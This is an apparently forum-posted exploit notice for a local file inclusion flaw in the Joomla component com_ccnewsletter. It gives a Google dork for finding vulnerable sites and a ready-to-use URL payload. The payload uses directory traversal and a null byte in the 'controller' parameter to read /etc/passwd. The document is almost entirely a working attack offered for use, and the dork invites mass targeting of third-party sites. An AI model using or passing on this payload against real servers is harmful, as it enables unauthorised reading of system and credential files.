Joomla Component com_ccnewsletter LFI Vulnerability

كود:
###########################################
.:. Author         : AtT4CKxT3rR0r1ST
 
.:. Email          : [email protected]
 
.:. Home           : www.sec-attack.com/vb
 
.:. Script         : Joomla Component com_ccnewsletter
 
.:. Bug Type       : Local File Inclusion [LFI]
 
.:. Dork           : inurl:"com_ccnewsletter"
 
.:. Date           : 28/1/2010
 
#############################################
 
===[ Exploit ]===
 
http://server/index.php?option=com_ccnewsletter&controller=[LFI]
 
http://server/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00